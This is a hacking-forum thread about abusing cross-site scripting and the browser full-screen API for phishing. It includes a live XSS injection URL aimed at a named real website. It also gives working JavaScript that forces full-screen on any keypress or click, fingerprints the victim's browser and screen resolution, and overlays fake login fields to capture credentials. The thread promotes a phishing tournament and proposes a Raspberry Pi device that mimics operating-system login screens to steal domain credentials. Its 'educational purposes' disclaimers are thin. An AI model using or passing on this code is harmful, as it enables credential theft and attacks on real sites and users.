Firefox Cross-Site Scripting (XSS)

Jackbox

Active Member
Jan 2, 2016
197
96
74
https://irandishwasher.ir/wp-admin/js/widgets/upgrade/error.php?websrc=53eeffff1b67e3824a25dbac7373fc5c&dispatched=790047563&id=79004756353eeffff1b67e3824a25dbac7373fc5c&email=a'lol'>">lol<b>heh<h1>no<style>body{background-color:magenta;

This will do a few things, including set a new background color.



Even if someone has a firewall here or there, the above will trigger an event on scroll.

This could result in a redirect, pop open a fake Facebook login, or other such behavior. Keep in mind it is also possible in some browsers to trigger full-screen by press a key(s). From full-screen, one could grab the browser's screen resolution/dimensions then display a fake login page to the victim. For example, we could generate fake logins for my.whatever.com based on [email protected], with the fake URL matching whatever.com, position the login boxes to overlay the fake login page etc.

This level of advanced phishing page display would make people's security headache multiply tenfold.

I may generate a PoC (Proof-of-Concept) just for educational purposes.

Going full screen on input can be demonstrated in this R4P3 forum posting. If you want a demo of what type of nightmare can occur, then simply go here: https://fiddle.jshell.net/q4ck7x79/show/

Firefox ironically handles this more securely than Chrome, while Firefox appears to lack certain XSS protection(s).

A little confused why security focus seems separated between the browsers. Perhaps I will make a video on how one could exploit this successfully, as I mentioned previously.. strictly for education purposes.

Another trick I am thinking of is drawing a fake tab UI at the top of the page, so when someone clicks - trigger full screen and fake login.

Also fake Window UI based on operating system detection.. such a PoC would be powerful in changing web browser security somewhat? Also, the .gov example was found with a simple Google dork I made up.


Simply find any PHP files on a domain, any dynamic scripted files on a server is a GREAT place to look for dynamic content issues.
 
Last edited:

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Here is an example:

Now for simply adding in detection of resolutions, drawing the input boxes, buttons, and then sending the data over to for example a proxy service that either authenticates the user (or not).

Hell, we could even really fully web proxy their entire Facebook experience which would provide an actual full-screen Facebook experience to the user through a web proxy of sorts.

This could be weird, but if possible.. I think phishing success could go up with this method. This is for education purposes only.

Update: something wrong in Firefox:
Code:
An iframe which has both allow-scripts and allow-same-origin for its sandbox attribute can remove its sandboxing. show
SyntaxError: expected expression, got '<'
light:56

TypeError: document.getElementById(...) is null
...
...
Request for fullscreen was denied because at least one of the document’s containing elements is not an iframe or does not have an “allowfullscreen” attribute. light
TypeError: The expression cannot be converted to return the specified type.
Request for fullscreen was denied because at least one of the document’s containing elements is not an iframe or does not have an “allowfullscreen” attribute. light
TypeError: The expression cannot be converted to return the specified type.

Assuming fix will be easy, further testing due. Above demo works perfectly on a 1920 res Google Chrome browser.
 
Last edited:

Asphyxia

Owner
Administrator
Apr 25, 2015
1,844
2
2,197
327
Want to join the phishing tournament? Go over here https://r4p3.net/threads/enter-phishing-tournament-and-you-could-win-5-000.7942/#post-71283

Cool news, found a way to make Firefox go fully black screen?! Honestly not sure wtf is going on here but worth looking into..

Code:
<center><img src="https://i.imgur.com/FEfW3TO.png"></center>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

<script>
function detectVictim()
{


alert(navigator.userAgent);

}

    function phullScreen()
    {
    document.body.innerHTML = '';
    document.body.style.backgroundImage = "url('https://i.imgur.com/aVVdsJw.png')";
    var el = document.documentElement,
    rfs = el.requestFullscreen
    || el.webkitRequestFullScreen
    || el.mozRequestFullScreen
    || el.msRequestFullscreen
    ;
    rfs.call(el);
  
    detectVictim();
    }
  
    addEventListener("mouseup", function() {phullScreen();});
    addEventListener("keypress", function() {phullScreen();});
    addEventListener("keyup", function() {phullScreen();});
    addEventListener("mousedown", function() {phullScreen();});
</script>

Could have just been image loading.. anyway, I have a modernized script to support resolutions.

Code:
<center><img src="https://i.imgur.com/FEfW3TO.png"></center>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

<script>
function detectVictim()
{

//alert(navigator.userAgent);
var victimAgent = (navigator.userAgent);

var usesChrome = victimAgent.includes("Chrome/");
var usesFirefox = victimAgent.includes("Firefox/");
var usesIE = victimAgent.includes("Trident/");

var victimWidth = screen.width;
var victimHeight = screen.height;
//alert(victimWidth);

if(usesChrome)
{
document.body.style.backgroundImage = "url(browser/Chrome/"+screen.width+"x"+screen.height+".PNG)";

document.body.innerHTML = '<input type="text" value="[email protected]" style="position:absolute; top: 106px; left: 786px;width: 152px;">';

}

}

    function phullScreen()
    {
    document.body.innerHTML = '';
    var el = document.documentElement,
    rfs = el.requestFullscreen
    || el.webkitRequestFullScreen
    || el.mozRequestFullScreen
    || el.msRequestFullscreen
    ;
    rfs.call(el);
   
    detectVictim();
    }
   
    addEventListener("mouseup", function() {phullScreen();});
    addEventListener("keypress", function() {phullScreen();});
    addEventListener("keyup", function() {phullScreen();});
    addEventListener("mousedown", function() {phullScreen();});
</script>

I am thinking that for every resolution, much like having a unique .PNG file for each resolution, also having a resolution-specific coordinate map (top, left, absolute, etc) for inputs such as text, buttons/submit, etc. This is very simple with JQuery, awesome explanation over here https://stackoverflow.com/a/6802969

Code:
var blahclass =  $('.blah');
blahclass.css('position', 'absolute');
blahclass.css('top', 0); //or wherever you want it
blahclass.css('left', 0); //or wherever you want it

Similar to the document.body.style.backgroundImage = "url(browser/Chrome/"+screen.width+"x"+screen.height+".PNG)"; bit, we could most probably import a resolution specific set of variables for positioning of elements to match up with the image. This is somewhat like CSS image maps with links.

Why do this work though? The process could be more automated but this type of a framework allows somewhat more complex attacks with a simplistic approach. Screenshot for resolution, coordinate map elements (especially login boxes and submit for taking credentials), and lastly this is a fresh take on phishing. I am honestly very curious why this type of attack is not more common. Speaking of which this made me think of another awesome concept, why not take a full screen capture of screen input, then take a raspberry pi connected to WiFi/mobile network.. and forward domain credentials. Not sure if anyone understands what I am saying but basically a drop 'n' run Raspberry Pi that essentially mimics the Windows/Linux login screen exactly. Detectable (fairly quickly) but you would get credentials quick quick.
 
Last edited:
Top